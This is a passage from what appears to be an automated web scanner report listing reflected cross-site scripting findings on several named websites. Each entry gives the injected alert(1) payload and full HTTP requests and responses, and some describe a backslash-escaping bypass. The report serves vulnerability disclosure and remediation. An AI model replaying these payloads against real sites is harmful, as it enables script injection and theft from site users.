This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63975/17983acd3149cc7b59eebf3385392137?callback=BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d&cb=8678 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:16:54 GMT
Date: Tue, 14 Jun 2011 00:16:54 GMT
Connection: close

BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d(1280325136);

3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/sys.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae139'><script>alert(1)</script>bafed2ed83c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:32:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4707

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57'>
...[SNIP]...

3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/automattic.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1f737'><script>alert(1)</script>5e66b7822e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25'>
...[SNIP]...

3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sites-sprite.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4388a'><script>alert(1)</script>3c963389289 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:35 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4725

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1'>
...[SNIP]...

3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd235'><script>alert(1)</script>f9a69b4d5e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2'>
...[SNIP]...

3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 158c7'><script>alert(1)</script>4f5547cba37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4'>
...[SNIP]...

3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /js/idm-combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77480'><script>alert(1)</script>bc81ff4a3c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1'>
...[SNIP]...

3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_bg_color request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 306cf'%3balert(1)//9384b172f5d was submitted in the zg_bg_color parameter. This input was echoed as 306cf';alert(1)//9384b172f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff306cf'%3balert(1)//9384b172f5d&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:23 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www146.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r11.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
fined) ? 37 : zg_wh;


var zg_fw = zg_cols*zg_wh+((zg_cols-1)*1); // border of one
var zg_fh = zg_rows*zg_wh+((zg_rows-1)*1); // border of one

var zg_bg_color = 'ffffff';
zg_bg_color = 'ffffff306cf';alert(1)//9384b172f5d';
var zg_url = 'http://'+fl_host+'/apps/badge/flashbadge.swf?host=http://'+fl_host+'&bg_color='+zg_bg_color+'&cols='+zg_cols+'&rows='+zg_rows+'&wh='+zg_wh+'&swapInterv='+zg_swapInterv+'&loadInterv='+
...[SNIP]...

3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_person_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43105'%3balert(1)//1a54a9cab45 was submitted in the zg_person_id parameter. This input was echoed as 43105';alert(1)//1a54a9cab45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N0043105'%3balert(1)//1a54a9cab45 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www100.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r07.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r16.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
.indexOf("MSIE 6") > 0 || ua.indexOf("MSIE 7") > 0) {
            // IE 5.5+
       } else {
            if (ua.indexOf('Gecko') == -1) return false;
       }
}
return true;
}
       
var zg_nsid = '56984041@N0043105';alert(1)//1a54a9cab45';
var zg_scope = '0';
var zg_favorites = '0';
var zg_tags = '';
var zg_tag_mode = 'all';
var zg_group_id = '';
var zg_text = '';
var zg_set_id = '';
var zg_context = '';

var zg_swapInterv =
...[SNIP]...

3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b114\"%3balert(1)//a2b9ca92c9 was submitted in the colors[2] parameter. This input was echoed as 2b114\\";alert(1)//a2b9ca92c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e12b114\"%3balert(1)//a2b9ca92c9&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68250

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e12b114\\";alert(1)//a2b9ca92c9;\" width=\"100%\">
...[SNIP]...

3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 927e6\"%3balert(1)//62c8519a6c1 was submitted in the colors[4] parameter. This input was echoed as 927e6\\";alert(1)//62c8519a6c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF927e6\"%3balert(1)//62c8519a6c1&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68020

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFF927e6\\";alert(1)//62c8519a6c1;\">
...[SNIP]...

3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0b3\"%3balert(1)//7fd3c255b13 was submitted in the colors[8] parameter. This input was echoed as ca0b3\\";alert(1)//7fd3c255b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=ca0b3\"%3balert(1)//7fd3c255b13&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67822

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: ca0b3\\";alert(1)//7fd3c255b13;\">
...[SNIP]...

3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b9b\"%3balert(1)//33ca1322ece was submitted in the colors[2] parameter. This input was echoed as 26b9b\\";alert(1)//33ca1322ece in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

